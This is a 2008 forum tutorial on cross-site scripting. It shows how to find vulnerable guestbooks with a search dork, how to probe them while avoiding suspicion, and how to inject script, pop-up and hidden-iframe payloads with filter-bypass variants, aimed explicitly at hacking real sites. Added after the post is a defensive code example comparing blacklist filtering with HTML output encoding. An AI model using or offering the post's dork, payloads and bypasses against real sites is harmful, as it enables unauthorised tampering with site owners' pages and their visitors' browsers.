08-23-2008, 12:45 PM
This is a simple guide to XSS. I tried to include some common methods used for XSS injection, so I hope you can find this useful to hack.
Find a vulnerable website:
Guestbooks are the most vulnerable, especially free guestbook scripts. You can search Google for something like:
Code:
allinurl:/guestbook.php
That should bring up some vulnerable sites. You can also do that on Yahoo (if Google filters your requests as spam).
Test It:
Test if it is vulnerable to this attack by posting something like:
Code:
<b>Nice Site</b>
Basically, make it look like you were innocently trying to make your comment stand out or something so the site won't be suspicious.
In the example above, if the text shows bold the site is vulnerable. Basically the idea is that if the HTML executes properly, the site is open to XSS attacks.
If it is vulnerable:
You can now do:
Code:
<script>alert('Hacked By OXY')</script>
Or even
Code:
<script>window.open("http://www.youtube.com/ironoxy")</script>
The first one displays a message box and the second one opens a website. Most XSS attacks will involve JavaScript or HTML because most people have JavaScript turned on in their browsers. A classic HTML XSS injection uses the <iframe> tag. This can be used to play music on the site! Just link it to a YouTube video, give the width and height values 0 and it will play music in the background.
Code:
<iframe src="http://www.youtube.com/A48SLD3.html" height="0" width="0" scrollbars="no">
Help, the JavaScript code didn't execute!
Sometimes a website may seem vulnerable but won't execute code. This is mostly because the website has a filter to try and prevent XSS attacks from happening. There are ways around these filters though.
Examples include:
Code:
')<script>alert('Hello')</script>
");alert('Hi');
<script type=text/javascript>alert("Hacked")</script>
<script>var var = 1; alert(Haxed)</script>
<script>alert("/Hack Me"/)</script>
<script>alert("Hi OXY")</script>;
<script>alert("Greetz");</script>
On some websites quotes are disabled, but you can get around that by using this:
Code:
<script>var VarIt = Hello!; alert(VarIt)</script>
No quotes at all in that.
Well, I hope you enjoyed this tutorial and I hope you will learn from it.
Good luck, OXY.
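Seen from the side of whoever runs the guestbook, the bold-text test and the filter section above come down to one fix: encode comments when they are written into the page instead of stripping known-bad strings. The following is an added example, not part of the original post; `naiveFilter`, `escapeHtml`, `renderComment`, `containsMarkup` and `audit` are hypothetical names, and the sample inputs are strings quoted in the post.

```javascript
// Added example: guestbook comment handling, blacklist filter vs. output encoding.
// All function names are hypothetical, not taken from any real guestbook script.

// Blacklist approach: strip the literal "<script>" and "</script>" strings.
function naiveFilter(comment) {
  return comment.replace(/<\/?script>/gi, "");
}

// Output encoding: every character with meaning in HTML becomes an entity,
// so the browser displays the comment as text instead of parsing it as markup.
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// How the guestbook page should emit a stored comment (element body context).
function renderComment(comment) {
  return '<p class="comment">' + escapeHtml(comment) + "</p>";
}

// True if the string still contains something a browser would parse as a tag.
function containsMarkup(html) {
  return /<[a-z!\/]/i.test(html);
}

// Inputs taken from the post above.
const samples = [
  "<b>Nice Site</b>",
  "<script>alert('Hacked By OXY')</script>",
  "<script type=text/javascript>alert(\"Hacked\")</script>",
  '<iframe src="http://www.youtube.com/A48SLD3.html" height="0" width="0" scrollbars="no">',
];

// For each input, record whether markup survives each defence.
function audit(inputs) {
  return inputs.map((input) => ({
    input,
    filteredStillMarkup: containsMarkup(naiveFilter(input)),
    encodedStillMarkup: containsMarkup(escapeHtml(input)),
  }));
}

for (const row of audit(samples)) {
  console.log(row.filteredStillMarkup, row.encodedStillMarkup, renderComment(row.input));
}
```

The blacklist only neutralises the exact `<script>` spelling; the bold tag, the `<script type=...>` variant and the `<iframe>` all pass through it, while the encoded output contains no parseable tag for any of the inputs.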
